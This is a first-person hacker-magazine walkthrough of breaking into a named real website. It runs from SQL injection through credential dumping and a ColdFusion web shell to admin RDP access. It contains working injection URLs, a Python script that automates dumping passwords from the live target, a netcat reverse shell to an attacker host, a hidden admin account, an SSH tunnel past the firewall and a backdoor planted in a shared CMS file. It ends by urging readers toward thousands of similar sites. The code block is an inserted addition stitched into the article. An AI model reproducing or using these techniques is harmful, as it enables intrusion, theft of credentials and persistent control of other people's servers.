
7 steps from Injection to the Admin Access via RDP

Every break-in has a goal of its own, and that goal determines its worth. Whether you deface a site for the amusement of thrill-seekers or collect yet another root shell is up to you. The reality is that any vulnerability in a web application is a threat to the server behind it. If you don't want to limit yourself to trite and somewhat boring SQL injection, this article is for you. The victim's address goes in and admin access over RDP comes out: a classic penetration.

The Prelude, or How It All Began


The beginning was trivial. First there was a URL. Somebody was very interested in that URL, and I had to see what could be done with it. The URL went straight into Firefox, which quickly returned a result: an institute or something of the kind, heaps of links, news, a menu and other junk. My mouse hopped from one link to another, and my spirits slowly rose. I have always liked sites with a huge number of question marks, parameters such as id and numeric values in links, and to tell the truth this site was stuffed with them like a dump with trash.

I glanced at the icon of my favourite scanner, grinned, and decided not to disturb the admins but to turn to the Great Index instead and settle everything quietly and peacefully. So, the magic phrase site:ism.ws, a click on the Search button, and... can we say the thing is over?

About 10,000 Google results promised a laborious task. Firefox quickly sprouted tabs, into which flew all sorts of quotation marks, equals signs, hyphens and other evil spirits.

Chapter 1, or All of Us are Sinful


Practice shows that almost every big resource has injections. There is certainly at least one small, inconspicuous, filterable injection; one just has to look closely. The cherished fruit was found at the following address:

http://www.ism.ws/Applications/Forms/FormDisplay.cfm?FormID=8464

Everything turned out so trivial that there was no doubt about the success of what followed. The familiar blue-grey ColdFusion error page appeared in front of me and showed the full SQL query, the DBMS type (SQL Server) and the script's local path. Generally speaking, the verbosity of ColdFusion's error messages is amazing: even the full call stack is given, more than one could ever want.

Chapter 2, or Long Live the Errors


Microsoft's database server has always amazed me with its capabilities. I'm not talking about the standards, which every DBMS vendor interprets in their own way; the guys from Microsoft simply follow a way of their own that nobody else knows. For instance, I like working with SQL Server: you don't need to find the number of columns or their types as you would for a UNION, you just provoke a conversion error and the answer hands you the data from the database on a silver plate. Very convenient! First we check that output works at all:

http://www.ism.ws/Applications/Forms/FormDisplay.cfm?FormID=8464+or+1=(select+@@version%2bchar(58)%2bdb_name()%2bchar(58)%2bsystem_user%2bchar(58)%2b@@servername)--

In response we get the following error:

[Macromedia][SQLServer JDBC Driver][SQLServer]
Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2050 (Intel X86) Mar 7 2008 21:29:56 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4) :RDCMS-ISM-Core:rms:ISMSQL01' to a column of data type int.

So we have a not-too-fresh server and a database called RDCMS-ISM-Core. Looking at the name I almost jumped for joy: the CMS in it made clear that the site had not been knocked together on somebody's lap, but that some big, respectable company had written this wonder and made lots of money on it. More about that later; the DB structure is next in line.

At this stage I like Microsoft's brainchild a good deal less. Not only did the developers not find time to implement proper result paging, they did not get row_number() into SQL Server 2000 either (it only appeared in SQL Server 2005). So a cool erotic adventure with the TOP construct awaits us. TOP is a trick that returns the first several rows of a query, but there is no way to say which row to start from, and given the circumstances of our unreal hacking that is very inconvenient. Of course one could go the standard way: fetch rows one by one, remember them and exclude them in the following queries. But I don't get off on that method: it is hard to automate, and the URL length is limited, so it fails on large databases.

That's why we'll cheat everybody: we sort up and then down and get acceptable paging. To spare the server we add a condition on the column name, so that only columns whose names contain 'password' are returned. And to make the process ultimately cool, let's first determine how many of them there are (query samples are given in the sidebar below). So, there are nine of them. Let's go!

The ES_LoginInfo table (RDCMS-ISM-Core : dbo : ES_LoginInfo : Password) caught my eye at once. Well, one could rub one's hands and order a pizza. But nothing of the sort. Having determined the table structure I got the following picture: the table held three interesting columns, EntityID, Username and Password. I think there is no need to explain that I quickly ran a new series of queries and saw the users' data. The passwords were there in the clear, and I could rush at breakneck speed to the site's desired admin panel. By the way, when I later reached the sources I could hardly understand why the passwords had not been hashed, since the CMS developers had provided for it (SHA-1, SHA-512, MD5) and had even implemented their own algorithm (iMIS). Anyway, I logged in, examined the site and returned to the dump of the database structure, because eight more tables had columns with passwords.

How Can Paging Be Done?

Every hacker dreams of getting all the data from a database with one query. However, life sets its own terms, and as a rule a hacker has to get information row by row. The trouble is that every DBMS vendor decided to complicate the situation in their own way. So let's talk about the paging schemes.

1. MySQL. It offers the construct limit [offset,] rowcount: return rowcount rows (in our case 1) starting from row offset. Well done!
2. Oracle. Use the pseudo-column rownum. The problem is that rownum is assigned as rows are returned, so a condition like rownum = n (for n > 1) returns an empty result. Subqueries are unavoidable here:

select fieldname from (select a.fieldname, rownum r from (select fieldname from tablename) a) where r = <offset>

(The filter on r has to sit in the outer query: inside the query that assigns rownum, r = <offset> would again be a condition on rownum itself and return nothing. Oracle also does not accept the keyword "as" in front of a table alias.)

3. SQL Server 2005. Here we take the standard way: use row_number(). For example:

select field1, field2 from (select row_number() over (order by a.field1) as r, a.field1, a.field2 from (select field1, field2 from tablename) as a) as b where r = <offset>

4. SQL Server 2000. The situation is tough here: we have only TOP. Apply this trick: to get the row whose number is offset, first select TOP <offset> rows sorted ascending, then out of that result select the first row sorted descending. The last row of the first result becomes the first row of the second, and the thing is done. Remember, though, that to get a correct result you must sort on every column in the query; otherwise the two orders are not exact mirrors of each other and the wrong row comes back.
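The following is an added example, not code from the original article or from the Results Direct CMS, that ties together the conversion-error trick from Chapter 2 and the SQL Server 2000 double-sort paging from item 4: it builds the TOP-based query for row n, wraps it in the same "or 1=(...)--" injection shape as the article's FormID payload, and parses the leaked value out of the ColdFusion error text. The HTTP fetch is passed in as a callable; the fake_fetch at the bottom is a constructed stand-in for the vulnerable page that runs no SQL and only answers the two query shapes built here. The sample table contents, the helper names and the char(58) wrapping of the value are assumptions of this example.

```python
import re
from urllib.parse import quote_plus, unquote_plus

# The ColdFusion / SQL Server 2000 conversion error quoted in the article; the
# leaked string sits between the single quotes.
CONVERSION_ERROR = re.compile(
    r"Syntax error converting the nvarchar value '(.*?)' to a column of data type int",
    re.S,
)


def paging_query(column, table, row, order_by=None):
    """SQL Server 2000 'double sort' paging: TOP <row> sorted ascending yields
    rows 1..row, and TOP 1 of that set sorted descending is row number `row`
    (1-based). Every selected column goes into both sorts so the two orders
    are exact mirrors of each other."""
    cols = list(order_by or [column])
    if column not in cols:
        cols.append(column)
    inner = (f"select top {row} {', '.join(cols)} from {table} "
             f"order by {', '.join(c + ' asc' for c in cols)}")
    # char(58) is ':'. Wrapping the value in a non-numeric character makes the
    # nvarchar->int conversion fail even when the value itself looks numeric.
    return (f"select top 1 char(58)+cast({column} as nvarchar(4000))+char(58) "
            f"from ({inner}) as t order by {', '.join(c + ' desc' for c in cols)}")


def count_query(table):
    """Row count, wrapped the same way so it also surfaces through the error."""
    return f"select char(58)+cast(count(*) as nvarchar(10))+char(58) from {table}"


def injected_url(base_url, param, value, subquery):
    """Inject into an integer parameter the way the article's FormID payload does:
    '<value> or 1=(<subquery>)--'. Comparing the int 1 with the nvarchar result
    forces the conversion error that carries the data."""
    payload = f"{value} or 1=({subquery})--"
    return f"{base_url}?{param}={quote_plus(payload)}"


def leaked_value(body):
    """Return the string quoted in the conversion error, or None when the response
    carries no such error (parameter not injectable, or verbose errors disabled)."""
    m = CONVERSION_ERROR.search(body)
    return m.group(1) if m else None


def dump_column(fetch, base_url, param, value, column, table, order_by=None):
    """Walk `table` one row per request and return the values of `column`.
    `fetch(url) -> str` is supplied by the caller; a real one would use urllib."""
    raw = leaked_value(fetch(injected_url(base_url, param, value, count_query(table))))
    if raw is None:
        raise RuntimeError("no conversion error in response; nothing to extract")
    total = int(raw.strip(":"))
    rows = []
    for row in range(1, total + 1):
        raw = leaked_value(fetch(injected_url(
            base_url, param, value, paging_query(column, table, row, order_by))))
        if raw is None:
            break
        rows.append(raw[1:-1])  # strip the char(58) wrappers
    return rows


# Constructed stand-in for the vulnerable page (not a real server): it recognises
# only the two query shapes built above and answers with the article's error text.
FAKE_LOGINS = [("alice", "Summer2008"), ("bob", "qwerty"), ("root", "p@ss:word")]
FAKE_COLUMNS = {"Username": 0, "Password": 1}


def fake_fetch(url):
    sql = unquote_plus(url.split("=", 1)[1])
    if "count(*)" in sql:
        leaked = f":{len(FAKE_LOGINS)}:"
    else:
        row = int(re.search(r"from \(select top (\d+) ", sql).group(1))
        col = FAKE_COLUMNS[re.search(r"cast\((\w+) as nvarchar", sql).group(1)]
        # Sorted by (Username, Password) ascending, which is what the query asks for.
        leaked = f":{sorted(FAKE_LOGINS)[row - 1][col]}:"
    return ("[Macromedia][SQLServer JDBC Driver][SQLServer]Syntax error converting "
            f"the nvarchar value '{leaked}' to a column of data type int.")


if __name__ == "__main__":
    base = "http://www.ism.ws/Applications/Forms/FormDisplay.cfm"
    print(dump_column(fake_fetch, base, "FormID", 8464, "Password",
                      "ES_LoginInfo", ["Username", "Password"]))
```

Against a live target, dump_column costs one request per row plus one for the count, and each URL grows with the row number only in the TOP value, so the length problem the article mentions for the "remember and exclude" approach does not arise. If leaked_value returns None on the very first request, the parameter is either not injectable this way or the server has stopped showing verbose errors; the loop also stops at the first row that comes back without an error rather than guessing.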

Chapter 3, or Access is Gained


The next table to catch my attention was SM_Sites, which had a column with the uncomplicated name FTPPassword. As it turned out, the table also had FTPUserName and FTPServer columns. Having pulled the data from the table I saw that ftp.rd.net and ftp2.rd.net were used as servers. The developer's own site is hosted at the rd.net address, and it emerged that the CMS bears the proud name Results Direct. I never understood why the account data was kept in the database, but it fit the FTP server, and an account named ism.ws.prod.code evoked optimistic ideas which, by the way, were soon confirmed. The FTP root resembled the root of the site itself. Having checked the availability of several scripts I finally established that the folders and files mapped onto the site. FTP access opened a new way of uploading files to the server and saved me the inevitable trouble of digging through the admin panel's functions and looking for a way to get a shell.

Chapter 4, or ColdFusion
I suppose everybody knows what to do with FTP. The idea of getting command execution on the server and escaping the tight embrace of the web application crosses one's mind at once. Obviously we need a web shell that will let us wander about the server and execute commands. The trouble was that no trace of PHP, or even Perl, was detected, which meant the moment of truth had come: we would have to program in ColdFusion. According to the developers this environment is very flexible and easy to master, but for some reason I don't like it at all. So we Google the topic of ColdFusion web shells and fail terribly: all the links led to one and the same plain piece of code that can only execute commands. Well okay, we'll complement it and add this and that; the tools are all there. Some time went into a really cool piece of development that produced two offspring: the first shows us directories and files, the second listens to us and follows orders.

The files quickly took their places. Soon afterwards I found that I had the privileges of the SYSTEM account, which was really cool. I just could not rest on my laurels.

Chapter 5, or Blackle
A web shell is certainly a great thing, but it is not as convenient as it may seem. We need to take the bull by the horns and get a proper console. Netcat went straight up over FTP. On the dedicated server netcat was started in listening mode, "nc.exe -l -p 1234", and on the victim the following command was executed through the web shell: "cmd /c nc.exe m0r0superdedik.com 1234 -e cmd". The shot was fired and the shell landed in the console. Having examined the file system and run about ten utilities, I decided that Windows without windows was a disaster. Windows 2000 predates Monad (PowerShell), I loathed installing anything, and for some reason managing the server was very inconvenient. Netstat showed port 3389 and my eyes lit up with joy. The very important and needful commands flew into the shell.

net user st password /add
net localgroup Administrators st /add

But running mstsc ended in total failure: a message arrived saying the host was unavailable. Nmap disappointed me even more, because only ports 80 and 25 turned out to be open. The host was obviously protected by a firewall and port 3389 was simply blocked. I did not want to give up, so I quickly made a list of the possible ways of getting a graphical interface:

VNC;
PPTP;
SSH.

Chapter 6, or Hello, Windows


The main problem was to organise an outbound connection to our dedicated server. The netcat experience had clearly shown that only inbound connections were blocked, so an outbound connection from some graphical remote-control system would certainly give us a way to manage the server. Of course the choice fell on VNC. The VNC deployment scheme is in general pretty simple (for TightVNC, for example):

1. Upload winvnc.exe and wm_hooks.dll to the server.
2. Install and start the VNC server:
winvnc.exe -install
net start "VNC Server"
3. Start the viewer on the dedicated server in listening mode.
4. Execute the reverse-connect command:
winvnc.exe -connect <host>:<port>

Almost everything was done, except for one small detail: access to the desktop. All my cherished hopes began fading because the shell ran under the SYSTEM account, spawned by a service with no interactive desktop. We wouldn't even have tried if we hadn't been hackers, but, just as expected, every attempt failed. I even tried Metasploit with the windows/vncinject/reverse_tcp payload (a very slow thing), but the Great Framework didn't help either. How to deploy VNC on a server from a non-interactive shell with no access to the desktop remained unknown. In fact I was even glad: why use VNC if there is RDP? We only had to get through the firewall.

The brilliant idea with PPTP was to establish a PPTP connection to our dedicated server and then reach the host through the tunnel's own addressing, carrying the traffic through the firewall. In Windows all connections are configured graphically, but there had to be a way to work from the console. Start Sysinternals' Process Monitor (Procmon, by Russinovich) on a test machine and watch the registry at the moment the client brings up the connection. The result defies logic: nothing interesting happens in the registry. Microsoft has surpassed itself. What was the use of creating a registry if its own modules don't use it? Let them think that over in their spare time; meanwhile we found a phone book at C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Connections\Pbk\rasphone.pbk, which actually describes the parameters of the dial-up and VPN connections. Establish a connection to the dedicated server (with the RRAS service installed and configured) on the test machine and copy the resulting file (rasphone.pbk) to the compromised host. Then create the following batch file:

rasdial connection_name user password
route add 0.0.0.0 mask 0.0.0.0 remotehostgateway

The second line is needed to restore the default route after the connection comes up, so that our dedicated server does not take over routing of all the host's traffic. I ran the .bat file and was simply knocked out: I would never get my hands on that connection, the firewall apparently blocked outbound connections by protocol type as well. Our GRE traffic (the carrier PPTP uses for the tunnel) had landed on the blacklist too.

We had almost given way to despair, but we didn't give up. To tell the truth we had been dumb for quite a long time, because we should have turned to SSH for help right away. By the way, it's a very high-end thing and has been discussed more than once in ][. Not only can we get a shell with it, we can also invent lots of other interesting things. Our last hope was to successfully take just three steps:

to launch an SSH server on the dedicated server
to upload an SSH client to the host
to connect and create the needed port mapping

I can understand a lot of things, but I don't know why in the 21st century Windows has no built-in SSH server. Well okay, we'll choose any one, all the more so since there are lots of them. Of course our favourite PuTTY is used as the client. But it's not just PuTTY, it's the magic one. If you remember, when connecting to a new host PuTTY sincerely offers to store the host key in its cache. Our access to the command line is not interactive, so we would not be able to answer that question. That means we need the host key to be stored automatically, but stock PuTTY can't do that. A little googling turned up Quest PuTTY 0.60_q1.129: it's the same thing plus what we need!

Upload plink.exe to the server and execute the following command:

plink.exe -nc m0r0superdedik.com:22 -batch -pw password -R 3390:127.0.0.1:3389 -L 3390:127.0.0.1:3390 -l st -auto_store_key_in_cache m0r0superdedik

Check the SSH server's console and rejoice: the connection is established! The -R 3390:127.0.0.1:3389 option makes the dedicated server's sshd listen on its own port 3390 and forward it back through the tunnel to the victim's RDP port, so the firewall never sees an inbound connection to 3389. Now start mstsc on the dedicated server and connect to localhost:3390. We see the Windows 2000 logon window. Enter the credentials added earlier with net user and enjoy the GUI with administrator privileges. Hurrah, it's time for a sip of a real rock'n'roll drink, whisky, to celebrate the success.

Chapter 7, or Let there be an Automation


At first sight everything is wonderful, but opening the web shell every time and starting the SSH connect command again the next day became too tiresome. So the coolest ColdFusion shell was slightly modified to run the connect command without any human participation. The shell modification code may be found on our DVD.

The piece of code was hidden in header.cfm, which in turn is included by almost all the CMS files. Then we create a simple form that points at any *.cfm file on the server and get a simple way of bringing up RDP.

<form action="http://www.ism.ws/about/MediaRoom/RequestForm.cfm" method="POST">
<table>
<tr><td>IP:</td><td><input type="text" size="20" name="ip" value="m0r0superdedik.com"></td></tr>
<tr><td>SSH-port:</td><td><input type="text" size="20" name="port" value="22"></td></tr>
<tr><td>User:</td><td><input type="text" size="20" name="login" value="st"></td></tr>
<tr><td>Password:</td><td><input type="text" size="20" name="password" value="password"></td></tr>
<tr><td></td><td><input type="submit" value="GO!"></td></tr>
</table>
</form>

The Epilogue, or Everything is Just Up to Begin


When the CMS developer's site was found I was eager to test its durability. The bug in the CMS was in the same place. But the SM_Sites table contained only one empty row, and my dreams of FTP did not come true. The passwords were hashed, apparently by that very ominous iMIS (120 bits long). I didn't feel like busying myself with it, so we leave it to you. And for a stimulus, type inurl:navItemNumber into Google and 12,000 entries will lure you and inspire you to perform exploits.
Carry every job through to completion even if it seems absolutely unreal, otherwise any initiative of yours becomes pointless. All the actions described above were taken while listening to the music of Brahms (thanks to "_xCort_" from torrents.ru). To paraphrase Kirill Nemolyayev, permanent DJ of the programme Smoke Under Water: listen to the classics and be happy!

WWW
To automate the vulnerability search you may use the following products:

acunetix.com/vulnerability-scanner/ - Acunetix Web Vulnerability Scanner
ptsecurity.ru/xs7.asp - XSpider
cirt.net/nikto2 - Nikto
sensepost.com/research/wikto - Wikto

INFO
Retrieving information from the DB by hand is tiresome and thankless. Look closely at the automation tools (or develop your own), for example SIPT. IMHO the program often glitches and works single-threaded, but it copes with its task well.

Read the full version of the article in the June issue of HACKER.

WARNING
Warning: this material is provided for informational purposes only. Neither the author nor the editorial board is responsible for your
actions!
